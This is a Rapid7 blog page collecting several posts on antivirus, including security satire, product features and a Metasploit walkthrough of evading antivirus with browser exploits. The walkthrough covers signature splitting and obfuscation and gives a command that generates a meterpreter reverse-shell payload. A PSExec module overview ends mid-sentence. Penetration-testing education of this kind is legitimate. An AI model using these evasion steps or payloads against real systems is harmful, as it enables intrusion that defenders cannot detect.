Rapid7 Blog

Antivirus  

The Twelve Pains of Infosec

One of my favorite Christmas carols is the 12 Days of Christmas. Back in the 90's, a satire of the song came out in the form of the 12 Pains of Christmas, which had me rolling on the floor in laughter, and still does. Now…

One of my favorite Christmas carols is the 12 Days of Christmas. Back in the 90's, a satire of the song came out in the form of the 12 Pains of Christmas, which had me rolling on the floor in laughter, and still does. Now that I am in information security, I decided it is time for a new satire, maybe this will start a new tradition, and so I am presenting, the 12 Pains of Infosec. The first thing in infosec that's such a pain to me is your password policy The second thing in infosec that's such a pain to me is default credentials, and your password policy The third thing in infosec that's such a pain to me is falling for phishing, default credentials, and your password policy The fourth thing in infosec that's such a pain to me is patch management, falling for phishing, default credentials, and your password policy The fifth thing in infosec that's such a pain to me is Windows XP, patch management, falling for phishing, default credentials, and your password policy The sixth thing in infosec that's such a pain to me is Lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The seventh thing in infosec that's such a pain to me is no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The eighth thing in infosec that's such a pain to me is users as local admins, no monitoring, Lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The ninth thing in infosec that's such a pain to me is lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The tenth thing in infosec that's such a pain to me is testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The eleventh thing in infosec that's such a pain to me is no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The twelfth thing in infosec that's such a pain to me is trust in antivirus, no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, Lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The first thing in infosec that's such a pain to me is your password policy When I go into organizations for penetration tests, one of the easiest ways to get in is through password guessing. Most organizations use a password policy of 8 characters, complexity turned on, and change every 90 days. So, what do the users do? They come up with a simple to remember password that will never repeat. Yes, I am talking about the infamous Winter16 or variations of season and year. If they aren't using that password, then chances are it is something just as simple. Instead, set a longer password requirement (12 characters or more) and blacklist common words, such as password, seasons, months, and company name. The second thing in infosec that's such a pain to me is default credentials The next most common finding I see is the failure to change default credentials. It is such a simple mistake, but one that can cost your organization a ton! This doesn't just go for web apps like JBOSS and Tomcat, but also for embedded devices. Printers and other embedded devices are a great target since the default credentials aren't usually changed. They often hold credentials to other systems to help gain access or simply can be used as a pivot point to attack other systems. The third thing in infosec that's such a pain to me is falling for phishing Malicious actors go for the weakest link. Often this is the users. Sending a carefully crafted phishing email is almost 100% successful. In fact, even many security professionals fall victim to phishing emails. So, what can we do about it? Well, we must train our employees regularly to spot phishing attempts as well as encourage and reward them for alerting security on phishing attempts. Once reported, add the malicious URL to your blacklist, and redirect to a phishing education page. And for goodness sake, Security Department, please disable the links and remove any tags in the email before forwarding off as "education". The fourth thing in infosec that's such a pain to me is patch management There are so many systems out there. It can be hard to patch them all, but having a good patch management process is essential. Ensuring our systems are up to date with the latest patches will help protect those systems from known attacks. It is not just operating system patches that need to be applied, also for any software you have installed. The fifth thing in infosec that's such a pain to me is Windows XP Oh Windows XP, how I love and hate thee. Even though Windows XP support went the way of the dodo back in 2014, over 2.5 years later I still see it being used in corporate environments. While I called out Windows XP, it is not uncommon to see Windows 2000, Windows Server 2003, and other unsupported operating system software. While some of the issues with these operating systems have been mitigated, such as MS08_067, many places have not applied the patches or taken the mitigation tactics. That is not to mention what unknown security vulnerabilities that exist and will never be patched. Your best bet is to upgrade to a supported operating system. If you cannot for some reason (required software will not run on newer operating systems), segregate the network to prevent access to the unsupported systems. The sixth thing in infosec that's such a pain to me is lack of input filtering We all know and love the OWASP Top 10. Three of the top 10 is included in this pain. Cross-Site Scripting (XSS), SQL Injection (SQLi), HTML Injection, Command Injection, and HTML Redirects are all vulnerabilities that can be solved fully, or at least partially in the case with XSS, with input filtering. Web applications that perform input filtering will remove bad characters, allow only good characters, and perform the input filtering not at the client-side, but at the server-side. Then using output encoding/filtering, XSS is remediated as well. The seventh thing in infosec that's such a pain to me is no monitoring In 1974, Muhammad Ali said “His hands can't hit what his eyes can't see” referring to his upcoming fight with George Foreman. This quote bodes true in Infosec as well. You cannot defend what you cannot see. If you are not performing monitoring in your network, and centralized monitoring so you can collaborate the logs, you will miss attacks. As Dr. Eric Cole says “Prevention is ideal, but detection is critical.” This is also critical to REVIEW the logs, meaning you will need good people that know what they are looking for, not just good monitoring software. The eighth thing in infosec that's such a pain to me is users as local admins Though for years we have been suggesting to segregate user privileges, yet almost every penetration test I perform I find this to be an issue. Limiting use of accounts to only what is needed to do their job is very hard, but essential to secure your environment. This means not giving local administrator privileges to all users but also using separate accounts for managing the domain, limiting the number of privileged accounts, and monitoring the use of these accounts and group memberships. The ninth thing in infosec that's such a pain to me is lack of management support How often do I run into people who want to make a change or changes in their network, yet they do not get the support needed from upper management? A LOT! Sometimes an eye-opening penetration test works wonders. The tenth thing in infosec that's such a pain to me is testing for compliance I get it, certain industries require specific guidelines to show adequate security is in place, but when you test only for compliance sake, you are doing a disservice to your organization. When you attempt to limit the scope of the testing or firewall off the systems during the test, you are pulling a blinder over your eyes, and cannot hope to secure your data. Instead, use the need for testing to meet compliance a way to get more management support and enact real change in the organization. The eleventh thing in infosec that's such a pain to me is no asset management You can't protect what you don't know about. In this regard, employ an asset management system. Know what devices you have and where they are located. Know what software you have, and what patch levels they are at. I can't tell you how many times I have exploited a system and my customer says “What is that? I don't think that is ours”, only to find out that it was their system, they just didn't have good asset management in place. The twelfth thing in infosec that's such a pain to me is trust in antivirus A few years ago, I read that antivirus software was only about 30% effective, leading to headlines about the death of antivirus, yet it still is around. Does that mean it is effective in stopping infections on your computer? No. I am often asked “What is the best antivirus I should get for my computer?” My answer is usually to grab a free antivirus like Microsoft Security Essentials, but be careful where you surf on the internet and what you click on. Antivirus will catch the known threats, so I believe it still has some merit, especially on home computers for relatives who do not know better, but the best protection is being careful. Turn on “click to play” for Flash and Java (if you can't remove Java). Be careful what you click on. Turn on an ad blocker. There is no single “silver bullet” in security that is going to save you. It is a layering of technologies and awareness that will. I hope you enjoyed the song, and who knows, maybe someone will record a video singing it! (not me!) Whatever holiday you celebrate this season, have a great one. Here's to a more secure 2017 so I don't have to write a new song next year. Maybe “I'm dreaming of a secure IoT” would be appropriate.

Finding and Protecting mission-critical assets with ControlsInsight

ControlsInsight helps organizations measure how well critical security controls are deployed and configured throughout the enterprise.   Yet, as hard you may try, it's extremely difficult to protect every asset on your network perfectly, and it's often necessary to prioritize "misson-critical" assets that store…

ControlsInsight helps organizations measure how well critical security controls are deployed and configured throughout the enterprise.   Yet, as hard you may try, it's extremely difficult to protect every asset on your network perfectly, and it's often necessary to prioritize "misson-critical" assets that store important or sensitive business data. Clearly, securing the laptop computer of Sally, the chief financial officer, is much more important than securing Joe the intern's laptop, which probably holds more cat pictures than financial models.The asset filtering feature in ControlsInsight, based on Rapid7 RealContext, is one way to track the status of controls for groups of assets that have been tagged as critical.  But what about a scenario when you want to verify the configuration of controls for a particular asset?  While the Assets tab lists all assets being assessed, if you know the IP address or host name of the asset you'd like to analyze, the search functionality in ControlsInsight will quickly get you the information you need.Let's say we know that Sally's computer has the IP 10.0.0.38 on our network.  Start by selecting the type of assets you'd like to analyze (we've selected Desktop assets in the example), and entering the IP address in the search box:After selecting the asset that represents Sally's desktop, we can see that she's still using Windows Vista Enterprise Edition (not seeing the assets you expect? check out our blog post on the subject).Oh no! It looks like Sally is running a high-risk system. She's one of the last people we want running a high-risk system, so let's do something about it. While we might want to have a sit-down with Sally about her choice of operating system, our first order of business is to make sure Sally is as well-protected as possible while she goes about her work. Let's click on the asset to find out what we can do to help.So it looks like there's lots of room for easy improvement of Sally's computing environment. Note that if rules like this are being tripped on one employee's computer, it's often symptomatic of not enough safeguards being in place company-wide, relating to things like antivirus operation, web browser updating, and default settings for fresh Windows installations. The Next Steps tab in ControlsInsight helps to prioritize corrective action at the enterprise level, but sometimes it's necessary to address a deficiency on a particular asset first.  Let's look at the list from Sally's laptop again with a focus on some of the easy-to-correct controls.System updates, antivirus, and web browser updates are some of the cornerstones of a good user defense. They're also fields that users are very familiar with, so they're a good place to start when securing users on your network.ControlsInsight provides you with a detailed breakdown of what exactly is wrong with the asset and the specifics of checks that have failed. Let's expand some of these controls to see what's wrong:After expanding some of the controls, we've got a clear view of the problems that were found. Let's look at some of the remediation steps that could solve them:Fixing antivirusIt looks like Sally has an antivirus program (in this case, Norton 360) installed, which is great news! It looks like it hasn't been updated in a while though. There are a few ways we can fix this:Ensure local updating is turned on in the IT team's base Windows images/installations.Talk to Sally about why she disabled her antivirus updating, and see what we can do/change to make it easier for her to leave it on (and update Sally's computer while we're there).Hardening web browsers on your networkIt looks like Sally's web browsers are a little less-than-perfect with regards to URL filtering and reputation scanning. As the web is one of the primary transmission vehicles for all sorts of malicious code, let's go over a few simple things that we can do to secure Sally's web experience:A good practice to increase web security on your network is to pre-install or provide a "trusted" web browser version/build. This way, we can change the default state of web browsers on the network from vulnerable/default to less-vulnerable/customized, and reduce the support surface for IT from every-browser-version-ever to a few versions (that may change over time). While there is some IT overhead to supporting a "trusted" version (and making sure that they keep up with updates to the browsers), it's often much more cost effective to spend properly on IT than face a data breach.Another good practice for hardening web browsers is to roll out a URL filtering strategy/default file along with turning on reputation scanning for your users, in the browsers your users use the most often (whether that be Firefox, Safari, Opera, or any of the tens of browsers out there).System updatesIn addition to Antivirus and web browser issues, it looks like the computer that Sally is running on has an older version of Windows Vista, which has UAC (User Account Control) disabled. While it is very difficult to corral all the high risk applications a user might have running on the system, it's often worth investing in updating the platform the applications run on (which in this case in Vista) to provide protection across the board. Here are some steps IT could take to fix these controls:Talk to Sally about whether she disabled UAC (and if so, why) and update Sally's computer with a newer Service Pack, and enable User Account Control.Update the Windows fresh install images being used at the company to ensure that UAC and newer Service Packs are always installed for users.After fixing these vulnerabilities on Sally's computer, we can enable her to get back to doing what she does best, securely and safely.Remember that security is often very much a human issue as it is a technological one.  Treat your end-users with courtesy and respect, and be empathetic to their needs, while protecting them from the big bad world out there.Anything you've done in your company that you've found especially helpful in managing mission-critical assets? If so, tell us about it in the comments below!

UserInsight's New User Statistics Provide Great Visibility for Incident Responders

Nate Silver made statistics sexy, and we're riding that wave. But seriously, breaking down some of the more noisy alerts on the network by users and showing you spikes can really help you detect and investigate unusual activity. That's why we've built a new UserInsight…

Nate Silver made statistics sexy, and we're riding that wave. But seriously, breaking down some of the more noisy alerts on the network by users and showing you spikes can really help you detect and investigate unusual activity. That's why we've built a new UserInsight feature that shows you anti-virus alerts, vulnerabilities, firewall activity, IDS/IPS alerts, and authentications by users that show the most activity and enable you to dig in deeper by filtering by user. You can get to the new stats page by clicking on the Active Users link on your UserInsight dashboard:What you'll see is the stats for five different data types:Virus Alerts: Most security professionals see anti-virus solutions as a protective solution for mass malware rather than a detection solution. However, we believe there is some value to this much-bashed data when you apply statistics to them and break them down by user. In our demo system, the user Shawna Roy popped up at the top of the list with 65 virus alerts. By clicking on the little graph icon on next to the name on the right, you can display the data for this user only (and add additional users to the chart by clicking their icon). Shawna saw 30 alerts on August 14, which is probably worth investigating. By clicking on the name itself, you can get more context on Shawna's activities, such as assets and cloud services she authenticated to, applications she accessed, and locations she logged on to the network from. This may show other indicators of compromise that can be helpful in triaging this statistical outlier.Exploitable Vulnerabilities: Slicing vulnerability data by CVSS score, exploitability, and critical hosts is something security professionals are very familiar with. However, most security programs can't provide visibility by user, which can be important in the context of phishing and other social engineering campaigns that target client-side vulnerabilities. The more exploitable vulnerabilities a user has, the more attack surface cyber-criminals have to work with. The new UserInsight vulnerabilities user stat feature shows you which users have the most exploitable vulnerabilities and warrant a second look to ensure that a security program is prioritizing the right vulnerabilities for remediation. It can also help give context of the likelihood that an attack against a certain user successfully exploited their machine.Firewall Activity: Firewall activity is very noisy, especially if you don't just take denies but all traffic. In the following example, Joshua Green had a million firewall connections in a single day, which is clearly an outlier when we filter for this user. This is definitely worth investigating, since it may be a sign of a malware/botnet infection that is scanning the Internet or participating in a DDoS attack. IDS: IDS/IPS data is also extremely noisy data. One customer we spoke to has 20,000 alerts per day, making it impossible for him to investigate every single one. Providing user context can also greatly increase visibility and help make sense of the data. Check out Matt's blog post on canceling noisy alerts, which covers a lot of this topic already.Authentications: Both successful and failed authentications can provide a lot of visibility into what's happening on your network. Accounts with many successful authentications can be legitimate or a cause for concern. There will be some obvious accounts, such as your vulnerability scanner or a backup solution that logs onto many devices many times, but there may also be accounts that should not exhibit this type of activity. You may discover that a user account is being abused as a service account, for example, which is not a best practice. Failed authentications may point you to a brute force attack on a certain user, or show you an issue with a device using an outdated password.Check out the new user stats page and let us know if you discover a use case that we're not listing here, or a new stat you'd find useful. The feature is already live in your UserInsight environment. If you don't have UserInsight yet, please sign up for a free guided demo and chat with us about a proof of concept in your environment to detect and investigate incidents.

Is AV dead? Why Symantec's executive is only half right about the state of anti-virus software

This week, a Symantec executive proclaimed that anti-virus is dead. Given the company's position in the AV market, it may be the most discussed comment coming from Symantec for some time; though in and of itself, I'm not sure the statement would elicit much of…

This week, a Symantec executive proclaimed that anti-virus is dead. Given the company's position in the AV market, it may be the most discussed comment coming from Symantec for some time; though in and of itself, I'm not sure the statement would elicit much of an argument from most security professionals.  Oh, except for the other AV vendors of course.For our own part, it's not news that we believe that AV is "limited".  In fact, Metasploit specifically offers AV evasion capabilities to represent the way that attackers behave.  Anti-virus only works to protect you against threats that are known.  And known in enough detail that it can be recognized and blocked on a variety of systems.  It's not rocket science to think then that a technically-skilled attacker with time will either tweak some existing malware, or create something new, so that it won't be recognizable to standard AV packs.Hence all that cynicism about AV, particularly among the pen testing community who face – and defeat – AV on a daily basis.  But here's where I have a hard time playing the funeral dirge for AV.See whether it's because you're lazy, or a total go-getter that wants to cram as much into your day as possible, either way you're likely to want to be as efficient with your time and effort as you can be. This is why people like automation (yes, that was a Metasploit Pro plug). This is also why there is a pretty decent market for crimeware packs.  And why not?  There is a lot of malware knocking about on the internet after 30 years or so of people creating it, and others creating flawed software to be exploited by it. And tragically much of it still works.So if I am an evil genius attacker (cybercriminals are all evil geniuses, no?) and I can get the goodies by using old malware that's been around for ages, why wouldn't I?  Why spend time and energy on creating something more elaborate when the old stuff still works, and meanwhile I can divert my time to creating a car that turns into a submarine to reach my secret underwater layer. Or sitting around playing Titanfall in my underwear.So yeah, I'm not ready to pronounce AV dead, and I still make sure my mom runs it on her computer because at least it affords her a level of basic protection against drive-by attacks. The Verizon Data Breach Investigations Report summarizes this with: "While many proclaim AV is dead, not having it is akin to living without an immune system."  I'm not sure I think AV is as effective as an immune system.  Rather, I'd compare it to a shower curtain – it protects you from the peripheral spray, but won't stand up to a direct deluge.This is where I think AV can become problematic, dangerous even. It can give people a false sense of security.  You need to remember that it doesn't make you bulletproof, not even close. So whether you're my mom or a Fortune 50 enterprise (and everything in between), you still need to practice good security hygiene and practices beyond deploying AV.  Which is where pen testing comes in… (though probably not for my mom).Testing AV evasion techniques is the way to understand the impact of directing the faucet right at the edge of the tub; just how soggy is everything going to get, and what problems does that cause?  To find out, why not try our updated AV evasion techniques which help you mimic a real-world attack?One final comment – if you are running AV, it's crucial that you keep it active and updated on all machines or it really is a pointless exercise – like having a holey shower curtain, or one made of rice paper. This is something Rapid7 ControlsInsight can help you with.  Now I'm off to my mom's place to update hers and work on my sub-car-ine.

Anti-Virus Evasion Makes Vulnerability Validation More Accurate

When think talk about anti-virus evasion, we mostly do so in the context of a penetration test: If the "bad guys" can evade AV solutions because they write custom payloads, then a penetration tester must do the same to simulate an attack. However, AV evasion…

When think talk about anti-virus evasion, we mostly do so in the context of a penetration test: If the "bad guys" can evade AV solutions because they write custom payloads, then a penetration tester must do the same to simulate an attack. However, AV evasion is also critical to vulnerability validation. While a full-scale penetration test looks for any way into the network, vulnerability validation surgically examines one vulnerability on a specific host and tests if it is exploitable. Security professionals do vulnerability validation because it enables them to determine if a vulnerability is "real" so they can prioritize it; many also use the validation to demonstrate the security exposure to their peers in IT operations to get quick buy-in to patch or mitigate the risk. Metasploit Pro integrates with Rapid7 Nexpose Enterprise to pull reported vulnerabilities for validation and pushing both validated vulnerabilities and vulnerability exceptions back into Nexpose for reporting and future testing, a process we call "closed-loop" vulnerability management.When you validate a vulnerability, you use the exploit associated to the vulnerability to test if it can be used on the machine. The idea is not only to rule out false positives but also to test if mitigating controls can stop an attack. For example, you may have closed a port on the host, shut down a service, or made adjustments on your firewall to protect the system from an attack. While anti-virus solutions are also considered security controls, they are mostly effective against mass malware attacks, not targeted attacks by a skilled attacker. When validating a vulnerability, you should therefore use anti-virus evasion that mimics these types of attackers to get a realistic picture on whether a certain vulnerability leaves a system open to attacks. If you don't, you may create an exception and accept the risk as mitigated while you're actually still vulnerable to an attack, giving you a false sense of security that could result in a breach.In the recent 4.9 release of Metasploit Pro, we have improved our anti-virus evasion and baked it into all processes that use payloads, including vulnerability validation. That means that simply by leveraging Metasploit Pro for vulnerability validation, you're already using anti-virus evasion to mimic a real-world attacker. AV evasion is not included in of Metasploit Framework, Community or Express, so we recommend that you use Metasploit Pro for vulnerability validations to get clean, realistic results. In fact, the classic Metasploit Framework payloads get flagged by most AV companies because they are readily available as open source, leading to false negatives in your vulnerability validation program. If you don't have a copy of Metasploit Pro but would like to give it a go, simply sign up for the free Metasploit Pro trial from rapid7.com.

Won't Someone Think of The AV Vendors?

Got Too Many Shells?Since the release of Metasploit 4.9, have you, the dedicated and resourceful penetration tester, been having is problem with being too successful at skipping past the defender's detection efforts? Are you getting too many shells? Maybe you're getting a little…

Got Too Many Shells?Since the release of Metasploit 4.9, have you, the dedicated and resourceful penetration tester, been having is problem with being too successful at skipping past the defender's detection efforts? Are you getting too many shells? Maybe you're getting a little embarrassed for the IT guys who are wondering what the heck just happened to their anti-virus protections.If that's the case, I have some good news! As of today, April 1, 2014, Metasploit is pleased to announce an entirely new feature for penetration testers: Anti-Virus Attraction!Anti-Virus AttractionTurns out, we're just too darn evasive for many-to-most AV solutions. So, in order to level the playing field between the penetration testers and the AV vendors, Metasploit Framework has extended the payload encoders and the executable generators to be a little less evasive by including some easy-to-detect data in our payloads. Well, a lot less.After several high level meetings and some deep-dive research in the field of malware detection, we've come up with a plan to address this too-successful problem. As of today, we now ship both the generic/eicar payload encoder (which works across all platforms) and the EXE::EICAR static executable generator (Windows-only).Detection: Not Quite 100%I'm pretty pleased with the results. Check out our VirusTotal hit rate:As you can see, 49 out of 51 of malware detection solutions successfully pick up EICAR. We're working on ensuring those last two are able to detect Metasploit as well -- if you know anyone over there, you might drop them a line and ask how you can help.UsageThe usage is straightforward. For example, here's how to encode any given payload to EICAR-compliance using the command line tool msfvenom:Note the size reduction, by the way -- the encoded payload is merely 68 bytes, which is 227 bytes smaller. A 77% savings in payload size is nothing to sneeze at!Generating a Windows EXE for any compatible Windows exploit is similarly easy -- just set the EXE::EICAR or MSI::EICAR option to true, and you'll be using the new static executable generator instead of the souped up dynamic one.Note, while these payloads and binaries are quite real and quite functional, actually using these will certainly ruin any chance of actually getting a working shell, since the EICAR test file standard does not allow for any kind of useful extension for functional requirements like opening network sockets. Oh well, it's a sacrifice.So, if you've been having a good a run you just have too many shells, and you feel like you need to throw a bone to defenders, give the EICAR transforms a whirl. This new feature is available today in the Metasploit Framework as of Pull Request #3168, and will be coming soon in an update of Metasploit Pro and Community editions -- in the meantime, download your free 7-day trial of Metasploit Pro today.If you happen to be more interested in AV evasion (how lame!) than AV attraction (yay!), join AV black belt ninja Dave Maloney on his free webcast "Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit Pro":Register for Americas time zone & on-demandRegister for European time zone

ControlsInsight...Controls discussed.

Rapid7 ControlsInsight allows organizations to quickly assess the deployment and configuration of 11 critical security controls from one platform; we'd like to take a brief look at these controls to discuss what they are and what they mean to the organization (Or as one of…

Rapid7 ControlsInsight allows organizations to quickly assess the deployment and configuration of 11 critical security controls from one platform; we'd like to take a brief look at these controls to discuss what they are and what they mean to the organization (Or as one of my professors was known to bark out at the end of a less than compelling presentation, "So what?")  Previous blogs have looked at unique password, browser up to date, and operating system up to date controls, in this installment we'll take a high level look at three more:Antivirus optimizedWhat does it mean: This control is to ensure that an AV tool (currently ControlsInsight supports McAfee, Symantec, Sophos, Trend Micro, Microsoft, and Kaspersky) is installed, enabled, and that the DAT file is current.Why it is important:  Corporations roll out AV to nearly every machine when deploying to new employees or upgrading older machines, on the day you receive your new laptop you have the latest and greatest (or not…I've received “core-load” machines in the past that were out of date when delivered to me), but over time signatures need to be updated or employees intentionally or unintentionally disable the AV leaving the machine and the organization vulnerable.  AV is mature and ubiquitous, while it is not perfect, neglecting to deploy and manage leaves a critical opening via the files that enter your organization on a daily basis.Code execution preventionWhat does it mean: This security best practice prevents modification of specific regions of memory on a hard drive by either intentional or unintentional means.  There are 4 specific tools that ControlsInsight monitors: ASLR, SEHOP, EMET, and DEP.Why it is important: Certain portions of a hard drive contain files that rarely need to be modified, this control, when enabled locks down those parts of the machine to prevent malicious activities or unintentional harmful modification of these files.Email attachment filtering enabledWhat does it mean: This control actively prevents users from receiving certain file types that may be high risk to the organization, typically .exe files.      Why it is important: While file attachments are an integral part of email, the key is to allow those that are safe and part of the business activities (.XLS, .PPT, etc) while blocking or severely limiting those that can introduce viruses or other risks (.EXE) into the organization.As highlighted in last week's blog, each of these controls can be enabled or disabled within your organization to tailor ControlsInsight to you.Want to try it in your organization?  Click here for a trial.

12 Days of HaXmas: A Cat and Mouse Game Between Exploits and Antivirus

This post is the twelfth, and last, in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013. In the final episode of 12 Days of HaXmas, we'll…

This post is the twelfth, and last, in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013. In the final episode of 12 Days of HaXmas, we'll talk about the holy war between browser exploits vs antivirus. It will sound a little biased from time to time, but note that It is not meant to compare who is better -- I don't have the resources to compare the entire matrix of AV solutions, only what's easily accessible by the average population. So, please don't read this like it's a full-blown, multi-million dollar research paper. It's just a blog. I can only discuss this from my own perspective - that is, me as an open source hacking tool provider, and my audience as the users - enjoy! Antivirus evasion is always a cat and mouse game, there is no argument about that. Whatever you do as an attacker, the talented engineers and researchers on the defense side will eventually solve the problems. And then you come up with something new, and the fight goes on until one of us retires. Take Metasploit for example, we offer several features that can be used (or are used) to bypass AV, and this is what's currently happening: Techniques Effectiveness Apache Template used by Windows meterpreter Heavily flagged by most AV. msfencode Decoding stub can be flagged by most AV. Encode more? Popular AVs should still be able to flag it. Custom template + encode more?? Popular AVs should still be able to flag it. ObfuscateJS Ineffective against some AVs. JSObfu Ineffective against some AVs. Specific exploit writing style Undetected for a few days, but good luck keeping it that way. Other commercial-level AV evasion technologies Not covered in this blog. Whatever evasion techniques you've made public AV will most likely flag them. Does it look kind of depressing? Yes. However, a wise man once said "if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle." So as an attacker, it's rather important to understand your own strength. You probably also just noticed I said "evasion techniques you've made PUBLIC," because the truth is, attacks should be made to be felt, not seen (my Yoda moment). And this also brings up the "secret" rule about Fight Club: "The first rule of Fight Club is you do NOT talk about Fight Club." You see, my man Tyler Durden just schooled you about cyber wars. But hey, we are Metasploit, so it's our job to keep everything as frank and open as possible. We are the opposite of Fight Club. Let There be Light Despite all the wonderful countermeasures AVs offer, they are still made by humans. What tends to happen is that AVs will only do just enough to make sure a malicious code is detectable. I can't speak for ALL antivirus out there (again, time and resources), but generally speaking these tend to be the places AVs look for in a browser exploit because they're commonly seen, and I'll try to briefly explain each: Heap spray routine Trigger for the vulnerability Payload Heap Spray That Gets Flagged Often browser exploits take advantage of some sort of memory corruption, for example: a heap-based overflow, or a use-after-free. And the "heap-spray" exploitation technique is used to prepare a specific memory layout to place the payload at a predicable place, and/or used to leverage an information leak that allows the exploit to read something in memory. There are plenty of ways a heap spray can be done: with images, with Javascript, ActionScript, or whatever. As long as something allocates memory on the heap (with user-controlled size and data), it is a good candidate for heap spraying. A typical spray looks something like this: For a quick demonstration, I saved the above Javascript as i_am_harmless.html, and then uploaded to VirusTotal. See results: So I got flagged, ain't no thing. What actually gets flagged in the code is kind of product-specific, but I'll pick Avast as an example because this is a pretty popular product. To find the specific lines that get flagged, we can use the "dsplit" technique. Basically this is a tool that splits data into chunks, and then you let the AV scan these chunks to identify which ones get flagged, whatever gets flagged is where the AV signature looks for, and that's what you should modify. You can use the same concept to find signatures for browser exploits. For Avast (and apparently, McAfee picks this up too), it specifically looks for the following code in the above Javascript - results here: How difficult is it to make two lines undetectable, right?: As of now, the above code will not be flagged by AVs, results can be found here. It's a very basic example on how exploits can bypass AVs, but should be enough to make a point. However, not all memory corruption based exploits need heap spraying. In the case of a use-after-free, if you have precise control of the memory release, the invalid use, you don't have to spray... well, at least no more than 18 1 times: 18 consecutive times to make sure a specific allocation size is enabled, the 1 to actually overwrite the freed memory right after that happens. Stuff like this is still pretty hard to detect, here's an example (i_am_kinda_harmless.html): The above code would look malicious in the eyes of an exploit developer, but not for an antivirus: In case you're wondering why this would be malicious, it's because: In function lfh(), the image object creates a specific size on the heap, and then the appendChild() calls in the loop will keep these allocations. In function overwrite(), when you assign something to the className property, you also trigger a heap allocation. If you're really curious, you can read this tutorial about "DOM Element Property Spray" by Peter Van Eeckhoutte, same idea (and callstack, even). When you put these routines in the right order (see main() function), the malicious intend stands out. It's pretty difficult for AVs to catch this behavior, so you'd kind of have to hope they catch something else in the code, like the trigger. Trigger That Gets Flagged A "trigger" is code that triggers the vulnerability, which implies triggers are bug-specific. There are a few ways your trigger wouldn't be detected: It's an 0day, there is no perfect and universal solution to find them all. There is more than one way to trigger the bug. For example: use-after-frees are commonly triggered by one or more event handlers, sometimes one is flagged but you still have other options available. Same with how you create an object, how you free, etc. Obfuscation. Modify a few keywords, and then you're done. This is so ridiculously easy, I'll use this one as an example. The following code is part of MS12-063 (execCommand use-after-free). Originally I was testing against G DATA, and at the time (almost a year ago) this is what it was flagging for the exploit: However, G DATA actually wasn't the only one flagging this code. Others like Ad-Aware, BitDefender, Emsisoft, F-Secure, MicroWorld-eScan, nProtect also flagged it as an exploit: Are you ready to know how to bypass this? Here's how: And nobody picks it up again: Payload That Gets Flagged One thing you should know about browser exploit payloads getting flagged is that, well, most of the time they're not flagged :-) So this makes things a lot easier for us. Metasploit browser exploits are already using payloads that are encoded with x86/shikata_ga_nai in Javascript format (little endian), which is the equivalent of the following command: msfpayload windows/meterpreter/reverse_tcp lhost=[IP] lport=[PORT] R |msfencode -t js_le When I uploaded the Javascript-based payload to VirusTotal, only two picked it up: It's pretty easy to get around these two with the Rex::Exploitation::JSObfu API in Metasploit. The lazy me did something like this during the experiment: msf > irb [*] Starting IRB shell... >> p = %Q| YOUR JAVASCRIPT PAYLOAD | >> Rex::Exploitation::JSObfu.new(p) >> js.obfuscate >> puts js ... The obfuscated output will be generated ... And the obfuscated version bypassed both of them (Microsoft and Norman): There's a little bit more to how AVs detect browser exploits. Another thing we haven't covered is the use of browser extensions to detect malicious pages at real time. There are also ways around them, but perhaps we'll share that experience with you next time. The moral of the story is that as you can see, AV evasion is a never-ending game. If your'e the user type, personally my take is it never hurts to learn how to code a little bit in your spare time, and modify a few lines of code in the exploit to get things smoothly when the time comes. And I promise you, it will come. After all, a tool is only as good as the skills of the craftsman/woman using it. If you are the developer type, now that you're more knowledgable about this cat and mouse game than ever, it is up to you to decide which side you want to contribute (offensive or defensive), and make the world a little better.

PSExec Demystified

Multiple modules inside the Metasploit Framework bear the title PSExec, which may be confusing to some users.When someone simply refers to “the PSExec module”, they typically mean exploit/windows/smb/psexec, the original PSExec module. Other modules are more recent additions, and…

Multiple modules inside the Metasploit Framework bear the title PSExec, which may be confusing to some users.When someone simply refers to “the PSExec module”, they typically mean exploit/windows/smb/psexec, the original PSExec module. Other modules are more recent additions, and make use of the PSExec technique in other ways. Here's a quick overview of what these modules are for:Metasploit ModulePurpose Comment exploit/windows/smb/psexecEvading anti-virus detection Service EXE is now getting caught by most AV vendors. Use custom templates or MOF upload method to circumvent AV detection.exploit/windows/local/current_user_psexecLocal exploit for local administrator machine with goal to obtain session on domain controllerGreat starting point to take over an entire network. Attack is less likely to get noticed because it uses legitimate access methods. auxiliary/admin/smb/psexec_commandRun arbitrary commands on the target without uploading payloads. Unlikely to be detected by AV but limited because you can only send one command, not obtain a session. auxiliary/scanner/smb/psexec_loggedin_usersGet list of currently logged in users Run this module against all targets to get tons of information on your targets. We'll now look at each one in detail below. First, let's talk about what PSExec is, and where the idea comes from.The PSExec UtilityThe name PSExec comes from a program by the same name. Mark Russinovich wrote this utility as part of his sysInternals suite in the late 90s to help Windows Administrators perform important tasks, for example to execute commands or run executables on remote systems.The PSExec utility requires a few things on the remote system: the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by firewall);  File and Print Sharing must be enabled; and Simple File Sharing must be disabled.The Admin$ share must be available and accessible. It is a hidden SMB share that maps to the Windows directory is intended for software deployments. The credentials supplied to the PSExec utility must have permissions to access the Admin$ share.PSExec has a Windows Service image inside of its executable. It takes this service and deploys it to the Admin$ share on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. It turns on the PSExec service on the remote machine. The PSExec service then creates a named pipe that can be used to send commands to the system.The PSExec Exploit (exploit/windows/smb/psexec)The PSExec exploit modules in Metasploit runs on the same basic principle as the PSExec utility. It can behave in several ways, many of them unknown to most users.The Service EXEIn this method, the exploit generates and embeds a payload into an executable, which is a 